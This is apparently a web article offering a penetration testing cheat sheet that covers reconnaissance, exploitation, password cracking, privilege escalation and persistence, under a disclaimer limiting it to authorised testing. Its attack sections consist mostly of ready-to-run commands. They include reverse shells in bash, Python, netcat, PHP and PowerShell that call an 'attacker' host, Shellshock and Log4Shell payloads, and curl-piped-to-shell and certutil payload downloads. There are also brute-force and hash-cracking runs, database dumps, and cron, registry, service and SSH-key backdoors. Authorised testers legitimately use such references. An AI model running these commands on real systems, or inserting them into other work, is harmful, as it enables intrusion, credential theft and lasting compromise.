Penetration Testing Cheat Sheet 2026: Security Assessment Guide

November 9, 2025

Comprehensive pentesting cheat sheet with tools for reconnaissance, scanning, exploitation, and post-exploitation. Includes nmap, Metasploit, and Burp Suite.

Penetration testing requires comprehensive knowledge of security tools and techniques. This pentesting cheat sheet covers essential commands for reconnaissance, vulnerability scanning, exploitation, privilege escalation, and post-exploitation, including nmap, Metasploit, Burp Suite, and more. For authorized security testing only.

Disclaimer

These tools and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal.

Reconnaissance

Network Discovery

# Host discovery
nmap -sn 192.168.1.0/24               # Ping scan (no port scan)
nmap -sn -PS22,80,443 192.168.1.0/24  # TCP SYN ping
nmap -sn -PU53,161 192.168.1.0/24     # UDP ping

# Quick scan
nmap -T4 -F target                     # Fast scan (100 common ports)
nmap --top-ports 20 target             # Scan top 20 ports

# Comprehensive scan
nmap -sS -sV -O -p- -T4 target         # SYN scan, version, OS, all ports
nmap -A -T4 target                     # Aggressive scan
nmap -sC -sV target                    # Default scripts + version detection

Service Enumeration

# Banner grabbing
nc -v target 80                        # Manual banner grab
nmap -sV --version-intensity 5 target  # Aggressive version detection

# Specific services
nmap -p 445 --script smb-enum-shares target     # SMB shares
nmap -p 3306 --script mysql-info target         # MySQL info
nmap -p 1433 --script ms-sql-info target        # MSSQL info
nmap --script vuln target                        # Vulnerability scan

DNS Enumeration

# Zone transfer
dig axfr @ns1.target.com target.com
host -l target.com ns1.target.com

# Subdomain enumeration
fierce --domain target.com
amass enum -d target.com
subfinder -d target.com

# DNS brute force
dnsrecon -d target.com -t brt
dnsenum target.com

Web Reconnaissance

# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://target.com -w wordlist.txt
dirbuster (GUI)

# Subdomain enumeration
gobuster vhost -u https://target.com -w subdomains.txt
ffuf -w subdomains.txt -u https://FUZZ.target.com

# Technology detection
whatweb target.com
wappalyzer (browser extension)

Vulnerability Scanning

Automated Scanners

# Nessus (commercial)
/opt/nessus/sbin/nessus-service

# OpenVAS
gvm-setup
gvm-start

# Nikto (web scanner)
nikto -h https://target.com

# Nuclei (template-based)
nuclei -u https://target.com
nuclei -l urls.txt -t cves/

Web Application Scanning

# OWASP ZAP
zaproxy

# Burp Suite
burpsuite

# SQLMap
sqlmap -u "https://target.com/page?id=1"
sqlmap -u url --dbs                    # Enumerate databases
sqlmap -u url -D dbname --tables       # Enumerate tables
sqlmap -u url -D dbname -T users --dump # Dump table

# XSS Testing
dalfox url https://target.com/search?q=FUZZ

Exploitation

Metasploit Framework

msfconsole                             # Start Metasploit

# Basic workflow
search exploit_name
use exploit/path/to/module
show options
set RHOSTS target
set LHOST attacker_ip
exploit

Common Exploits

# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
exploit

# Shellshock
curl -A "() { :; }; /bin/bash -c 'cat /etc/passwd'" https://target.com/cgi-bin/test.cgi

# Log4Shell (CVE-2021-44228)
# Payload: ${jndi:ldap://attacker.com/a}

Password Attacks

Hydra

# SSH brute force
hydra -l user -P passwords.txt ssh://target

# HTTP POST form
hydra -l admin -P passwords.txt target http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# FTP
hydra -L users.txt -P passwords.txt ftp://target

# RDP
hydra -l administrator -P passwords.txt rdp://target

John the Ripper

# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt                  # Show cracked passwords

# Crack with rules
john --wordlist=wordlist.txt --rules hashes.txt

# Specific hash types
john --format=NT hashes.txt             # NTLM
john --format=raw-md5 hashes.txt        # MD5

Hashcat

# MD5
hashcat -m 0 hashes.txt wordlist.txt

# NTLM
hashcat -m 1000 hashes.txt wordlist.txt

# WPA/WPA2
hashcat -m 2500 capture.hccapx wordlist.txt   # Legacy mode; hashcat 6+ uses -m 22000 with .hc22000 files

# With rules
hashcat -m 0 hashes.txt wordlist.txt -r rules/best64.rule

Post-Exploitation

Linux Privilege Escalation

# System enumeration
uname -a                               # Kernel version
cat /etc/issue                         # OS version
cat /etc/passwd                        # Users
cat /etc/shadow                        # Password hashes (if readable)
sudo -l                                # Sudo permissions

# Find SUID binaries
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# World-writable files
find / -writable -type f 2>/dev/null

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS (automated)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows Privilege Escalation

# System info
systeminfo
whoami /priv
whoami /groups

# Find files
dir /s *pass* == *cred* == *vnc* == *.config*

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# WinPEAS (automated)
winpeas.exe

# PowerUp (PowerShell)
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

File Transfer

# HTTP server (attacker)
python3 -m http.server 8000
php -S 0.0.0.0:8000

# Download (victim Linux)
wget http://attacker:8000/file
curl http://attacker:8000/file -o file

# Download (victim Windows)
certutil -urlcache -f http://attacker:8000/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8000/file','file.exe')"

# SCP
scp file user@target:/tmp/

# Base64 transfer
base64 file | nc target 4444           # Sender (start the receiver first)
nc -l 4444 | base64 -d > file          # Receiver

Shells & Backdoors

Reverse Shells

# Bash
bash -i >& /dev/tcp/attacker/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Netcat
nc -e /bin/sh attacker 4444            # Requires a netcat build with -e (traditional nc or ncat); OpenBSD nc lacks it

# PHP
php -r '$sock=fsockopen("attacker",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Listeners

# Netcat listener
nc -lvnp 4444

# Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit

Shell Upgrade

# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z                                 # Background the shell
stty raw -echo                         # Run in the local terminal
fg                                     # Return to the shell
export TERM=xterm

# Script
script /dev/null -c bash

Persistence

Linux

# SSH key
mkdir /root/.ssh
echo "ssh-rsa AAAA..." > /root/.ssh/authorized_keys

# Cron job
echo "* * * * * /tmp/.backdoor" > /etc/cron.d/persist

# .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc

Windows

# Scheduled task
schtasks /create /tn "Update" /tr C:\backdoor.exe /sc onlogon /ru System

# Registry run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\backdoor.exe"

# Service
sc create backdoor binpath= "C:\backdoor.exe" start= auto
sc start backdoor

Useful Tools

# SearchSploit
searchsploit apache 2.4.49
searchsploit -m exploit_id              # Mirror exploit

# Exploit-DB
https://www.exploit-db.com/

# GTFOBins (Linux privilege escalation)
https://gtfobins.github.io/

# LOLBAS (Windows living-off-the-land)
https://lolbas-project.github.io/

# CrackStation (hash lookup)
https://crackstation.net/

# CyberChef (data manipulation)
https://gchq.github.io/CyberChef/

Reporting

Always document:

  • Scope and methodology
  • Findings with severity ratings
  • Proof of concept with screenshots
  • Remediation recommendations
  • Executive summary

Last Updated: March 8, 2026